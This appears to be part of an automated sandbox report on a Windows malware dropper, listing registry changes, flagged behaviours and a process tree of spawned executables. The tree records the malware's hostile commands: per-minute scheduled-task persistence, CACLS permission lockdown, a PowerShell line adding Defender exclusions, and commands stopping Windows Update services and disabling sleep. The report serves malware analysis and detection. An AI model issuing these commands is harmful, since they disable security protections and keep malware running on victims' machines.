| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2891 = "Sudan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\4853.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\kos4.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\6863.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\6fff71e22472096a9504705dd57be5306efe418a44897afce0875aba7822a72f.exe
"C:\Users\Admin\AppData\Local\Temp\6fff71e22472096a9504705dd57be5306efe418a44897afce0875aba7822a72f.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\4532.exe
C:\Users\Admin\AppData\Local\Temp\4532.exe
C:\Users\Admin\AppData\Local\Temp\45DF.exe
C:\Users\Admin\AppData\Local\Temp\45DF.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\46CA.bat" "
C:\Users\Admin\AppData\Local\Temp\4796.exe
C:\Users\Admin\AppData\Local\Temp\4796.exe
C:\Users\Admin\AppData\Local\Temp\4853.exe
C:\Users\Admin\AppData\Local\Temp\4853.exe
C:\Users\Admin\AppData\Local\Temp\494E.exe
C:\Users\Admin\AppData\Local\Temp\494E.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ML5UJ9UF.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ML5UJ9UF.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
C:\Users\Admin\AppData\Local\Temp\4A49.exe
C:\Users\Admin\AppData\Local\Temp\4A49.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SB7jI9jw.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SB7jI9jw.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rL2Jv7vH.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rL2Jv7vH.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff8e9b046f8,0x7ff8e9b04708,0x7ff8e9b04718
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iU3eD1eN.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iU3eD1eN.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fz10YT6.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fz10YT6.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff8e9b046f8,0x7ff8e9b04708,0x7ff8e9b04718
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
C:\Users\Admin\AppData\Local\Temp\65B1.exe
C:\Users\Admin\AppData\Local\Temp\65B1.exe
C:\Users\Admin\AppData\Local\Temp\671A.exe
C:\Users\Admin\AppData\Local\Temp\671A.exe
C:\Users\Admin\AppData\Local\Temp\6863.exe
C:\Users\Admin\AppData\Local\Temp\6863.exe
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16092351630515486246,2762268884051782601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2232 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,3815385126526038010,7916656242102816677,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16092351630515486246,2762268884051782601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16092351630515486246,2762268884051782601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,16092351630515486246,2762268884051782601,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2904 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\71DA.exe
C:\Users\Admin\AppData\Local\Temp\71DA.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,16092351630515486246,2762268884051782601,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,16092351630515486246,2762268884051782601,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\kos4.exe
"C:\Users\Admin\AppData\Local\Temp\kos4.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16092351630515486246,2762268884051782601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3900 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:N"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1460 -ip 1460
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16092351630515486246,2762268884051782601,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2gD885Bc.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2gD885Bc.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 572
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4384 -ip 4384
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4384 -s 540
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16092351630515486246,2762268884051782601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16092351630515486246,2762268884051782601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3752 /prefetch:1
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Z1026-1"
C:\Program Files (x86)\Drive Tools\zDriveTools.exe
"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16092351630515486246,2762268884051782601,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp
"C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp" /SL5="$70216,6502186,54272,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
C:\Program Files (x86)\Drive Tools\zDriveTools.exe
"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -s
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Query
C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:R" /E
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,16092351630515486246,2762268884051782601,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6148 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,16092351630515486246,2762268884051782601,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6148 /prefetch:8
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Users\Admin\AppData\Local\Temp\18B9.exe
C:\Users\Admin\AppData\Local\Temp\18B9.exe
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
